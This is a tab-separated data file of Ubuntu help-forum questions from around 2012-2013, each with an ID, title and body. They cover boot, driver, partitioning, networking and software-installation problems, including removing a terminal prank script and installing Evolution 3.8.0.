280130	ubuntu 11.10 will only start in restore mode	i have ubuntu 11.10 , with gnome , running on a dell inspiron 620 . it was running fine until the power company came around and turned off the power to change a meter . now , when i try to boot it up , it will only start in restore mode . i tried check all file systems and it reported that it had fixed the hardware clock . i then ran repair broken packages and it ran to completion but it still will not start in graphics mode . whe i try to start it up in normal mode , the screen just remains black . when the terminal started up in restore mode , i entered sudo service lightdm start that got stuck on stopping userspace bootsplash i tried to fix this with the following procedure sudo apt-get clean sudo apt-get autoclean sudo apt-get autoremove sudo dpkg-reconfigure -phigh -a reboot i went into recovery mode again and entered sudo service lightdm start it failed on : - stopping automatic crash report generation - starting deferred execution scheduler - starting save kernel messages - starting load fallback graphics devices this time it did get past `` stopping userspace bootsplash '' now it hangs on starting cups printing spooler/server
280133	can not shutdown or restart using ubuntu 12.10	i use ubuntu 12.10 recently installed . now it can not shutdown or restart . i remember it was shut-downed or restarted properly a few days ago . now when i shutdown it , the screen turns to black swiftly that i only see a few statements beginning from `` stopping ... . '' . any suggestion ? mike
280141	files are listed as wrong size in 12.04	hi all got a weird situation here . the other day i noticed when i wanted to seed a file for an older torrent , that the file size was wrong on my computer . the torrent said the file was say 450 mb , but when i went to look for the file , it was listed as say 480 mb ! bigger by maybe 10 % . this was just weird , but turned out to be a big pain in the butt because i made a vdi file for virtualbox at a fixed size of 15.8 gigs , and now it is listed as 17 gigs on ubuntu ! which means i ca n't put it on the 16 gig memory stick i have ! ( and yes , the memory stick has enough room for 15.8 gigs on it , in case anyone is wondering ) so , this is not the end of the world , i just have to buy a 32 gig stick now , but i am like wtf you know ? ? what gives as the kids say . all other sources of information are consistent , and therefore ubuntu is wrong . the website says the file is 450 , the torrent file and the torrent client all say the file is 450 . virtualbox says the file is actually 15.8 gigs , it even handily provides an `` actual size '' value which says ... 15.8 gigs ! only ubuntu is giving these larger numbers . therefore ubuntu is wrong . why , dear goddess why ? ?
280146	fastest net card option in virtualbox with ubuntu	i 'm using a mac air with virtualbox and ubuntu 10.04 . on the network adapter options , which setting is the fastest ? also , what are these settings used for , or their advantages and disadvantages ? nat bridged adapter internal network host-only adapter generic driver
280152	os not found in the grub after complete installation	i have an hp pavilion dv6 laptop which initially came with windows 7 , runs on intel core i5 , has 4gb of ram and 640gb of hard disk space.few months back i installed windows 8 on it . but finally i decided to make a complete switch to ubuntu 12.04 lts ( i.e . without a dual boot ) . i got an iso of the amd64 version ( which i am not sure would prove to be a catch in my situation ) . i burned the iso on a usb using the universal usb tool.the installation proceeds smoothly , completes and asks me to reboot.once i do that , all i get is the memory test running , finishing and then starting all over again.when i reboot and press shift to view the grub , ubuntu is not on the list and the only thing is the `` memtest '' ( which i think is the reason why the memory test is running indefinitely ) .please help .
280161	rhythmbox not working in ubuntu 12	rhythmbox has failed to play any audio file , keeps on bring error : could not start playback.. null the import errors log shows the error as : problem occured without error being set . this is a bug in rhythmbox or gstreamer . but vlc can play the audio files so the audio drivers are definitely okay .
280162	hybrid graphic card management in ubuntu 12.10	i need to know how to manage a hybrid dual graphic card on my laptop . here 's the config : *-display description : vga compatible controller product : robson ce [ amd radeon hd 6300 series ] vendor : advanced micro devices [ amd ] nee ati physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : **driver=radeon latency=0** resources : irq:45 memory : c0000000-cfffffff memory : e0600000-e061ffff ioport:3000 ( size=256 ) memory : e0620000-e063ffff *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : **driver=i915 latency=0** resources : irq:43 memory : e0000000-e03fffff memory : d0000000-dfffffff ioport:4000 ( size=64 )
280169	ubuntu heat & fan control on lenovo	i tried to use ubuntu ( 12.10 ) on my macbook pro 8,2 but it wasnt possible to use because it was always very hot and in fact there was n't fan control . the fans always turned the same speed and nothing what i installed and tried helped . now i want to buy a lenovo laptop and i hope there are not that problems . has all ubuntu certified hardware , in my example the lenovo laptops , a good working fan control and heat management ? the ibm thinkpad t41 is not ubuntu certified . but is there a correct fan control / heat management ? thanks a lot !
280172	answered windows 8/ubuntu 12.04 dual boot	i 've had trouble with installing on an external hard drive like i planned to , so i 've decided it would be better just to set up a dual boot on my system . i 've been searching to make sure i do it correctly , but i am running into some differences between my system and the ones being described and want to make sure it wo n't cause me any problems . i 'm running a windows 8 that i had upgraded form 7 , so it would n't be a secure boot if i 'm correct on that since it was n't preinstalled . most of what i am coming across talks about using a preinstalled windows 8 so i wanted to make sure this wo n't cause me any problems installing it as normal . the other problem i 'm running into is everything i am finding talks about installing on a uefi enabled system , and i 'm running a legacy bios at the moment . is that going to cause a problem ? if so , is there a way i can make my machine a uefi enabled system so that i do n't run into these problems ? the computer i have is a dell inspiron n5040 laptop if that is needed , and if necessary i can give you whatever specs you may need . if you need any more information from me on my machine or anything , just let me know i 've possible , i 'd also like to know how i would go about removing ubuntu if i decide i do n't like it ( though i doubt that would be the case ) or if i for some reason ca n't get it to work . i 've found some guides that require the original windows cd but i do n't have that , and i 've found some about using easybcd but from what i 've seen it does n't have a windows 8 option .
280181	12.04 lts and nvidia-current do n't work	recently , an automatic security update upgraded my nvidia driver to `` version current '' . upon restart , i have a blank , but otherwise functional logon screen and desktop screen . by that , i mean the screen is black , but you can `` use '' the computer exactly as if the monitor was turned off . purging and reinstalling the driver does n't remedy things . the video card is a geforce 9800 gt , which should be supported by the current nvidia driver . i 'd prefer to figure out why they do n't work and fix that , but at this point i 'd be willing to downgrade to a version i know for sure works , which is no longer offered in the additional drivers window .
280188	why is the lenovo thinkpad x301 not ubuntu certified ?	the lenovo thinkpads x100e , x201 and x220i are ubuntu certified . why is the x301 not certified ? never been tested for certification or failed the certification for some ( which ) reasons ?
280193	does the scansnap ix500 work with ubuntu ?	fujitsu just released their latest scanner , the scansnap ix500 . does this scanner work with ubuntu , or linux in general ?
280196	how do i assign an ip address to an lxc container ?	i 'm trying to start lxc containers with their own public ip address on the network . this is what i 've tried so far : on the host the host machine has an ip address of 192.168.255.254 . i added a bridge , br0 , in the same subnet : auto eth1 iface eth1 inet static address 192.168.255.254 netmask 255.255.0.0 auto br0 iface br0 inet static address 192.168.255.1 netmask 255.255.0.0 i 've also enabled ip forwarding ( net.ipv4.ip_forward = 1 in /etc/sysctl.d/20-lxc.conf as per this guide ) in /var/lib/lxc/ $ name/config : lxc.network.type=veth lxc.network.link=br0 lxc.network.name=eth1 on the container in /etc/network/interfaces : auto eth1 iface eth1 inet dhcp address 192.168.255.99 netmask 255.255.0.0 when i try to start the container , it ca n't get an ip address : cloud-init-container : emitted ifup for eth1 cloud-init start-local running : thu , 11 apr 2013 07:27:54 +0000 . up 1592.73 seconds no instance data found in start-local cloud-init-nonet waiting 120 seconds for a network device . cloud-init-nonet gave up waiting for a network device . ci-info : lo : 1 127.0.0.1 255.0.0.0 . ci-info : eth1 : 1 . . 00:16:3e : cf:20 : b5 route_info failed this is the output of route : default 10.0.2.2 0.0.0.0 ug 0 0 0 eth0 default 10.0.2.2 0.0.0.0 ug 100 0 0 eth0 10.0.2.0 * 255.255.255.0 u 0 0 0 eth0 10.0.3.0 * 255.255.255.0 u 0 0 0 lxcbr0 192.168.0.0 * 255.255.0.0 u 0 0 0 eth1 192.168.0.0 * 255.255.0.0 u 0 0 0 br0 what am i doing wrong ?
280200	ubuntu does not boot , but windows does	on my old computer i would like to install ubuntu 12.10 . now the strange thing is it does not boot the dvd disc from ubuntu . the windows disc however boots normally . if i disable the harddisk in the bios settings it does boot , but now i do n't see a harddisk during the installation . does anybody know a solution ?
280202	ca n't see ubuntu partitions in windows disk manager !	apologies for any stupid questions as i am an ubuntu newbie ( an impressed one , for sure ! ) . i have installed ubuntu alongside windows 7 using wubi . before doing so , i however did not create a separate partition on my hard drive . my hard drive has a single partition i.e. , c : which had a windows 7 installation and i installed ubuntu in the same partition . i have a few questions around this : first of all , can there be any issues with the way i have installed ubuntu i.e. , in the same partition as windows ? if so , what are they ? is it recommended that i move the ubuntu installation into another separate partition ? if not , the rest of my questions are kind of irrelevant , but it might still be helpful to get the answers for the same for my understanding . how safe is it to create a new partition from windows disk manager without adversely affecting my system including my ubuntu installation ? i would think it should be safe , but i have scorched my hands earlier with partitions and do n't want to jump into it without expert advice . from what i have read on the forums , it looks like directly moving the ubuntu installation to the newly created partition is not going to be possible . am i right ? if i have to uninstall ubuntu and re-install it again into the new partition ( i am ok to do this for at the moment , i have not had the ubuntu installation even for a month and there is no data i have created in it and not many programs installed yet ) , i understand that i have to use a program like easybcd to overwrite the boot record from windows and then delete the ubuntu partitions from windows disk manager . before i do that , i wanted to check if i could see the ubuntu partitions from windows disk manager , but i ca n't . how will i be able to delete them then or uninstall ubuntu ? ! thanks for your help !
280207	wubi migration : grub does not boot	i migrated from a wubi install on a ssd ( dev/sda ) , with the virtual disk on a separate drive ( /dev/sdb ) , to a brand new partition on the separate drive i recall during me running the wubi-move script , it stated that the bootloader and grub2 were being installed to dev/sdb . i migrated root and the swap to dev/sdb4 and dev/sdb5 respectively . but when the computer boots , it continues to show the windows boot manager , not the new grub as i expect , and i am not sure how to resolve my issue . i can see that the migration was successful , so i am thinking there are probably many possible solutions . can i just reinstall grub2 or something of that nature ? if possible , i would rather have grub boot first , and be able to remove the wubi install from within windows to the original mounting point which was a 30 gig spot on dev/sdb1 .
280208	what 's the difference between 'sudo [ command ] ' and 'sudo sh [ command ] ?	i 'm trying to install vmware workstation in my ubuntu 12.04.2 lts . if i execute the following command : sudo ./vmware-workstation-9.0.1-894247.x86_64.bundle it finishes at once and the installation never starts . if i execute this command : sudo sh ./vmware-workstation-9.0.1-894247.x86_64.bundle the installer can be launched successfully . why does this make a difference ?
280210	why ca n't we remove bluetooth service the reguler way ?	the usual way to remove services from startup scripts is to remove it from starting up in the first place ( man update-rc.d ) . meaning removing the symbolic link to /lib/init . in this case executing should do the job : update-rc.d -f bluetooth remove but why this does not work in the case of bluetooth deamon ? can someone explain a little deeper what is going on ? and if i remove the link by force is the bluetooth chip/hardware still eating my battery ? here is what happens : sudo update-rc.d -f bluetooth remove removing any system startup links for /etc/init.d/bluetooth ... sudo ls -la /etc/init.d/ | grep bluetooth lrwxrwxrwx 1 root root 21 mar 21 2012 bluetooth - > /lib/init/upstart-job* so the link remains . and there seems to be other confused people [ 1 ] [ 2 ] trying different solutions to the bluetooth behaviour . [ 1 ] how can i deactivate bluetooth on system startup ? [ 2 ] how to boot with bluetooth turned off
280211	how do i resize my /boot partition ?	/boot has become 100 % full somehow . df -k filesystem 1k-blocks used available use % mounted on /dev/mapper/ubuntu-root 191078052 31758960 149612804 18 % / udev 3997520 8 3997512 1 % /dev tmpfs 1602244 856 1601388 1 % /run none 5120 0 5120 0 % /run/lock none 4005600 1792 4003808 1 % /run/shm none 102400 28 102372 1 % /run/user /dev/sda1 233191 218740 2010 100 % /boot mount /dev/mapper/ubuntu-root on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) /dev/sda1 on /boot type ext2 ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) vmware-vmblock on /run/vmblock-fuse type fuse.vmware-vmblock ( rw , nosuid , nodev , default_permissions , allow_other ) gvfsd-fuse on /run/user/foo/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=foo ) how can i make the space allocated to /boot bigger ? there is a related question how do i free up more space in /boot ? but that is not what i want to do . added . disk /dev/sda : 200.0 gb , 200049647616 bytes 255 heads , 63 sectors/track , 24321 cylinders , total 390721968 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0007f9dc device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 390721535 195109889 5 extended /dev/sda5 501760 390721535 195109888 8e linux lvm disk /dev/mapper/ubuntu-root : 198.8 gb , 198784843776 bytes 255 heads , 63 sectors/track , 24167 cylinders , total 388251648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-root does n't contain a valid partition table disk /dev/mapper/ubuntu-swap_1 : 1006 mb , 1006632960 bytes 255 heads , 63 sectors/track , 122 cylinders , total 1966080 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-swap_1 does n't contain a valid partition table
280220	remote desktop from windows to lubuntu	is there a way to remote connect ( via windows remote desktop ) to my ubuntu server which has the lubuntu desktop , just like is possible with unity ?
280226	file system for ubuntu 12.10 ?	i am new to ubuntu & want to dual boot my windows 7 laptop . i am confused as to which file system should be used for the ubuntu drive . some people say fat32 is must while some say ext4 is better . i am absolutely new to this ext4 file format . so will a file created in ubuntu with ext4 open in windows 7 with ntfs vice versa ? sorry if this is a very basic doubt . also is ext4 efficient than ntfs ( i know that fat32 is pathetic compared to ntfs for large sized drives ) . thank you .
280228	how can update-manager update without the root password ?	we need to fill in our password every time for logging in , installing new software , even for unlocking the the password manager ( is think it the only annoying thing about using ubuntu ) . but when ubuntu ask for updates we can press `` install updates '' and everything installs without filling in a password . is this a bug ? or just the way how ubuntu works ?
280229	12.04 vs 12.10 ?	i am new to ubuntu & want to dual boot my windows 7 laptop . which version of ubuntu should i install if i want better performance with greater stability . since there are significantly more tags for 12.04 than 12.10 on this website , is 12.04 better ? my laptop has 64 bit architecture , so i will be installing the 64 bit version . thank you .
280231	updated answers for 32 bit vs 64 bit ubuntu ?	i have intel 3rd gen processor i5 & ati radeon 7670m gpu in my 64 bit laptop . i want to install ubuntu . but i am not able ti understand which version to install . the answers for this question are old . so i wanted to know the answers for the latest ubuntu i.e . 12.10 . thank you .
280238	how to make a video from seperate frames	i used blender to create an animation , and i set the output to png . so i it is easier to analyse the animation . now i want to turn those 180 png frames into a video . this is something that can be done with movie maker on windows . is there software on ubuntu to do this ? thank you
280239	installation error , live system does not exist	on rebooting from usb stick ( used universal usb installer to write ubuntu onto it ) , the installation starts but halts after a few seconds giving error : unable to find a live system what should i do ?
280240	i can show my folders in windows8 , but i ca n't in ubuntu , why ?	i have installed windows8 , then i installed ubuntu 12.10 , all partitions are appeared well in windows8 & ubuntu . i have c which have windows8 system , and ( d & e ) as an extended partitions and ubuntu two partitions ( file-system & swap ) i can see folders in all partitions but i ca n't in d ( in ubuntu ) when i want folders in d , i must restart pc to open windows8 can you tell me why ? how can i solve it ? thanks : )
280242	how to install ar5523 chipset wifi in ubuntu 12.04 ?	my usb wifi device is ovislink evo-w108usb lsusb bus 001 device 008 : id 0cf3:0002 atheros communications , inc. ar5523 ( no firmware ) i tried to install rpm from manufactured after convert to .deb file but unsuccesfully .
280250	ipv6 : ping6 from foreign host works , but can not ping6 on same host	i have a strange issue with ipv6 on ubuntu 12.04 . there are two hosts , directly connected to the internet . both have assigned a /64 network . they are properly configured with a /128 endpoint each and one can ping6 the other and vice versa . my plan was to terminate a /112 subnet of my assigned ipv6/64 to the interface to have plenty of addresses for usage in apache2 vhosts . but that 's not the point . host a : $ ifconfig eth0 link encap : ethernet hwaddr ( ... ) inet6 addr : fe80 : :5246:5dff : ( ... ) /64 scope : link inet6 addr : 2a01 : xxx : xxx:000a : :2/64 scope : global $ route -a inet6 kernel ipv6 routing table destination next hop flag met ref use if 2a01 : xxx : xx:000a : :/64 : : u 256 0 0 eth0 fe80 : :/64 : : u 256 0 0 eth0 : :/0 fe80 : :1 ug 1024 0 0 eth0 : :/0 : : ! n -1 1 5689 lo : :1/128 : : un 0 1 18 lo 2a01 : xxx : xx:000a : :2/128 : : un 0 1 202 lo 2a01 : xxx : xx:000a : :/112 : : u 1024 0 0 lo fe80 : :5246:5dff : fea1:977c/128 : : un 0 1 86 lo ff00 : :/8 : : u 256 0 0 eth0 : :/0 : : ! n -1 1 5689 lo host b can ping6 2a01 : xxx : xx:000a : : [ 0001-ffff ] correctly and works as i expected it . but on host a , i can not ping my own addresses . if i try to ping6 2a01 : xxx : xxx:000a : :n , i get this one : $ ping6 2a01 : xxx : xxx:000a : :3 ping ( ... ) 56 data bytes ping : sendmsg : invalid argument ping : sendmsg : invalid argument ping : sendmsg : invalid argument i suspect the routing table , but i 've played around with it a long time and even using google i ca n't get it work . any ideas ? thanks .
280270	partitions required for installing ubuntu ?	i have a laptop with 1tb hard disk space . i can allocate 100gb for ubuntu . currently there is only windows 7 installed . i am new to ubuntu & am confused by terms like mount point , root partition , swap partition , etc . the doc over here gives some details , but i dont know what they mean . for installing ubuntu i have shrunk 100gb from a drive & now that space is unallocated . so what should i do now ? in how many partitions should i divide that space & what conventions should be followed . should i do this in the ubuntu installer or should i do all this before installing ubuntu ? please i dont understand the terminologies used on that doc so please tell me in simple language . thank you .
280271	sometimes , ubuntu does not boot	i have been having a problem with ubuntu ever since i installed it . i have no clue why it is doing it , but i will try to provide as much detail as possible . first , i want to say that i am duel-booting with windows 7 . secondly , this is not the only time this has happened ( i think it might be because of ubuntu 12.10 because it never `` not booted '' when i used ubuntu 12.04 ) , but instead , this was with another pc . this is very strange to me because i have two laptops and one desktop ( i’m using the desktop which has the boot problems ) , and this is strange because i installed ubuntu on a fairly old laptop and i duel booted with the good one ... the good one booted like , 1/4 times while the old laptop booted 100 % of the times . now , i don’t know if this is because i 'm duel booting or not but it is still , very unclear to me . now , onto what happens on screen . i’m sure that some of you out there would know what the duel booting screen looks like , it has that purple background with the white text ( including the booting options ) . now when i select the ubuntu booting option , it stays on the same screen for a couple of seconds , then , it cuts to a purple screen for approx ... 10 seconds . after those couple of seconds , a semi-error screen will pop up ( this is nothing but a cluster of black lines and other colors of the rainbow ( this would last for about 1.3 seconds ) ) . then ( this is path 1 ) , a black screen this time with the text : [ ok ] _ note that the '_ ' will continue to flash , might i add that the mouse is highly visible on the screen and is movable ( what i think this means is that i’m on the desktop but nothing is visible . and now path 2. now , path 2 consists of another black screen but no text is visible , only the mouse is . ok , now onto what happens when it does work . everything is normal ( except for everything being slow , but i think its best that we work out this issue first ) , now what do i mean by normal ? imagine a video showing you `` what to do after installing ubuntu '' , it looks just like that . no ui screwing up or even problems updating , just everything being ... good . btw if anyone wants to know the specs for this pc , there right here . ill also be listing what monitor i 'm currently using : http : //nscom.com.au/product_info.php ? products_id=69053 http : //nscom.com.au/product_info.php ? products_id=75534 note , if anyone needs a video of what it looks like when loading up ubuntu , i would be happy to do that ( i 'll include a youtube video ) , but ill only do that if its like `` the last hope for man-kind '' .
280272	ubuntu 12.04 totally freeze while browsing or virtualbox	my system : ubuntu 12.04 64-bit 8 gb memmory intel core i3 540 amd ati rv710 [ radeon hd 4350 ] - graphic driver i have tried to figure out what is causing the freeze , but not found it . it happens typically when i browse in any browser with sites with flash content or are more graphically . it also freezes when i use virtualbox and i have had a lot of difficulty installing different distros on the virturalbox . i have manage to install after tweaking virtualbox , but it still freezes the whole system . i have tried both to not use the proprietary graphic driver and not , both freezes . i was running ubuntu 10.04 lts before and everything worked fine until after i installed ubuntu 12.04 lts . i have put more memory in between , but running memtest did not find any errors . regarding browsers , chrome was the worst browser , so i have uninstalled it . opera and firefox still crashes . i have tried ctrl + alt + f1 - no response . i have tried alt + sysrq + reisub slowly - no response . what happens is that the screen locks and there is no response from any equipment . only way to get it running is to push the reset button on my computer . it actually froze when i was using the firefox spell checker ( right mouse click ) on this question . so how can i get a stable system ? how can i find what is wrong ? how to fix it ?
280274	remove menu entries from indicator-applet-complete	i would like to remove shutdown entry from indicator-applet-complete in gnome-classic session in ubuntu 12.04 . is there a way to achieve that ? i do n't want to prevent shutdown but just remove entry so users does not blindly click shutdown instead logout .
280278	kde inside ubuntu install	i am using ubuntu with kde-full desktop now . i want install it for my friends computers too . so installing kde-full as long as ubuntu installs , it would help me . i want have an install usb , that contains kde inside . i can install ubuntu with usb , then installing kde-full with commands in terminal . but i need kde inside ubuntu version ( like as kde inside mint ) . how can i provide ubuntu version that have kde as predefined desktop and have kde apps in it ?
280279	why my ubuntu 12.10 ca n't recognize canon ip1980 ?	i 've tried installing the required package from canon europe , but when i go to cups 1.6.1 , and i click `` add new printer '' it keep saying : no printer found help me please .
280289	how to install downloaded programs ?	i am trying to install qucs-0.0.16 please help me how to install this simulation software which i was downloaded in the ta.gz format , i have tried some of the steps given but its not working please help me ... !
280290	gvim does n't show up in unity apps menu	if i enter `` vim '' in unity search ( after pressing super key '' ) nothing shows up . i can only start gvim by using alt+f2 and entering gvim . why does this happen ?
280291	no unity or sys tray ?	i have the same issue . initial upgrade from 12.10 was a disaster and ended up having to reinstall off a fresh burnt cd . the result was a patchy workable 13.04 but applications seem to un install themselves at will and now i have lost the systray and unity munu bar . i am able to function through the cairo dock at present . also thought about booting into gnome to see if that helped but it was not an option on the login screen . instead of that or the ubuntu login i had a cairo login symbol consisting of a circle with cd in it ! ! i am by no means a programmer but a jobbing user who up untill now has flown the flag for the linux distro . i would love some idiot proof advice please .
280292	how to remove rick roll script at terminal startup ?	i injected an sh script ( https : //github.com/jart/rickrollrc ) using ./astley.sh inject evil for a joke but now when i need the terminal i have to wait and then lets me do commands . how do i un-inject the script so i can go on the terminal immediately ? also i 'm using ubuntu 12.04 lts if that helps .
280293	installing qucs manually displays qt header errors	rajath @ rajathkumar : ~ $ cd downloads rajath @ rajathkumar : ~/downloads $ cd qucs-0.0.16 rajath @ rajathkumar : ~/downloads/qucs-0.0.16 $ ./configure checking build system type ... i686-pc-linux-gnu checking host system type ... i686-pc-linux-gnu checking target system type ... i686-pc-linux-gnu checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether to enable maintainer-specific portions of makefiles ... no checking for g++ ... g++ checking whether the c++ compiler works ... yes checking for c++ compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes checking for style of include used by make ... gnu checking dependency style of g++ ... gcc3 checking for gcc ... gcc checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking dependency style of gcc ... gcc3 checking for ranlib ... ranlib checking for ar ... ar checking for lrelease-qt3 ... no checking for lrelease ... /usr/bin/lrelease checking for lupdate-qt3 ... no checking for lupdate ... /usr/bin/lupdate checking for moc-qt3 ... no checking for moc ... /usr/bin/moc checking for uic-qt3 ... no checking for uic ... /usr/bin/uic checking how to run the c preprocessor ... gcc -e checking for x ... libraries , headers checking for gethostbyname ... yes checking for connect ... yes checking for remove ... yes checking for shmat ... yes checking for iceconnectionnumber in -lice ... no checking for qt headers ... configure : error : not found
280302	usb modem stopped connecting	i had my usb modem zte working fine on ubuntu , untill yesterday it wo n't connect anymore , yet it 's detected as a modem in the connection manager but it wo n't connect , i tried it in windows to make sure n it was working fine , and i have no idea how to troubleshoot the usb modem ! ! ! thanks in advance. ! this 's what i get trying to connect
280307	use proxy connection as if it were direct connection	i have a proxy internet connection . however some applications i need to run that do not work under proxy , and require direct connection . is there some way by which my proxy connection behaves as direct connection ?
280312	gui program to resize pdf documents and change their dpi	i see that libreoffice draw should be able to open a pdf and export it with options for changing quality and dpi resolution . but the high-resolution scanned pdfs that i have are not properly opened in this application ( only the first page is imported ) so i want to find a more specialized application . i am not asking for a command line option at this point ( my pdfs are so big that all that i tried in this way failed ) .
280317	how to vpn to ubuntu server so i can browse the internet ?	i want to browse the internet from work by passing my traffic via an encrypted link to my home ubuntu server and out on to the internet from there . obviously the replies will have to go to my home server first and then back to me via the encrypted link . can anyone point me in the right direction to get this working ? typical use cases are a : watching uk only websites when i am abroad on business ( so i appear to be in the uk ) b : bypassing the web filters at work which are so stupidly restrictive they block access to my personal blog which is about running and on which i am currently trying to raise sponsorship money for charity before the london marathon in a week ! cheers !
280323	how to monitor udp connections request time/duration ?	practically i 'm looking for a way to view lagging connections , especially dns connections ( udp:53 ) . the closest i 've got was using tcptrack as it shows idle time , but unfortunately it 's only for tcp connections and there is no way to sort by idle time . what is the simplest way to do this , practically i 'm looking for a netstat command with a connection duration/idle column . it can be a gui as for now i just want to do some monitoring and see what 's holding back .
280326	i installed ubuntu 11.10 along with win7 and win8.. , but it shows me 3 ubuntu os 's in the boot ( in startup )	i 've installed ubuntu 11.10 along with win7 and win8.. , but it shows me 3 ubuntu os in the boot ( in start up ) . but it shows me all ubuntu os 's are at the same drive itself , when i selected those remaining to those two are also redirected to the same os which is installed in the same drive . will you please tell me how to remove those excess ( extra 2 ubuntu ) os options from boot menu ?
280327	how to make terminal autocomplete when there are several files/directory ?	if i have several directories , like : afoo abar sometimes my terminal will refuse autocomplete when i press tab ( e.g . `` cd a '' then tab ) , and print the list of directories instead . sometimes it even throws a noisy , annoying sound . any idea how to make it autocomplete in cases like this ? e.g it can show abar first , and then afoo if i press tab again . i saw this is the case in windows , or some applciation in ubuntu
280333	rename files in group	i 've folder and file structure like folder/1/filenameone.ext folder/2/filenametwo.ext folder/3/filenamethree.ext ... how can i rename the files such that the output becomes folder/1_filenameone.ext folder/2_filenametwo.ext folder/3_filenamethree.ext ... how can this be achieved in linux shell ?
280339	windows 8 wo n't boot via grub after intalling 12.10 with boot-repair	i hope someone here might be able to help me . i 've just purchased a new acer aspire v3-771g laptop which came pre-installed with windows 8 . i shrunk the main windows partition and installed ubuntu 12.10 . i then had to run boot-repair to be able to boot to ubuntu . here 's the paste url : http : //paste.ubuntu.com/5698647/ this worked and i could now boot ubuntu and it provided me with 3 other entries which should supposedly allow me to boot back to windows 8 . however when trying these menu entries i get the following errors : windows uefi bkpbootmgfw.efi /endentire file path : /acpi ( a0341d0,0 ) /pci ( 2,1f ) /unknownmessaging ( 12 ) /hd ( 2 , c8800,96000 , fe030bf1430a6047,9a,9a ) /file ( \efi\microsoft\boot ) /file ( bkpbootmgfw.efi ) /endentire error : can not load image . windows boot uefi loader /endentire file path : /acpi ( a0341d0,0 ) /pci ( 2,1f ) /unknownmessaging ( 12 ) /hd ( 2 , c8800,96000 , fe030bf1430a6046,9a,9a ) /file ( \efi\boot ) /file ( bkpbootx64.efi ) /endentire error : can not load image . efi/oem/boot/bootmgfw.efi /endentire file path : /acpi ( a0341d0,0 ) /pci ( 2,1f ) /unknownmessaging ( 12 ) /hd ( 2 , c8800,96000 , fe030bf1430a6046,9a,9a ) /file ( \efi\oem\boot ) /file ( bootmgfw.efi ) /endentire error : can not load image . i have looked in the /boot/efi partition and the .efi files listed in grub are there but i always get this error . i would be very greatful of any suggestions on how to get windows 8 to boot . many thanks , tom
280340	can not make live snapshots on ubuntu 12.04 xcp-xapi	i have installed xcp-xapi on ubuntu 12.04 , i can run vms perfectly but i can not make live snapshots , i receive the following error message : xe vm-snapshot new-name-label=my_snap vm=482c0f4c-fa7d-67c1-a178-559b81b79ede error code : sr_backend_failure_82 error parameters : , failed to snapshot vdi [ opterr=failed to pause vdi xxxx-xxxx-xxxx-xxxx-xxxx ] ,
280342	why do `` df '' and `` du '' commands show different disk usage ?	i can not access ubuntu system on my pc , the error message : `` the system is running in low graphics mode '' and i tried some commands i searched from internet . i found out a problems seems there is no available disk space . i used `` df '' and `` du '' commands to check , the results are as follow : du -j -- max-depth=1 23g ./home 3.3g ./usr ... ... 28g and df -th filesystem type size used available use % mounted on /dev/sda5 ext4 68g 68g 0 100 % / how would i clean up the system for more disk space ?
280344	are these terminal commands safe for installing evolution 3.8.0 ?	i run 12.04 and want to update my evolution to 3.8.0 . i found a solution and would appreciate help knowing , whether it is correct and safe . any better solutions are welcome . i have never compiled from source and am a beginner . thanks to install evolution 3.8.0 in ubuntu 13.04/12.10/12.04 and mint 15/14/13 , open terminal ( press ctrl+alt+t ) and copy the following commands in the terminal : sudo wget http : //archive.ubuntu.com/ubuntu/pool/main/e/evolution/evolution_3.6.0-0ubuntu3_i386.deb sudo dpkg -i evolution_3.6.0-0ubuntu3_i386.deb sudo apt-get install -f if any error you can follow this command : sudo apt-get install evolution
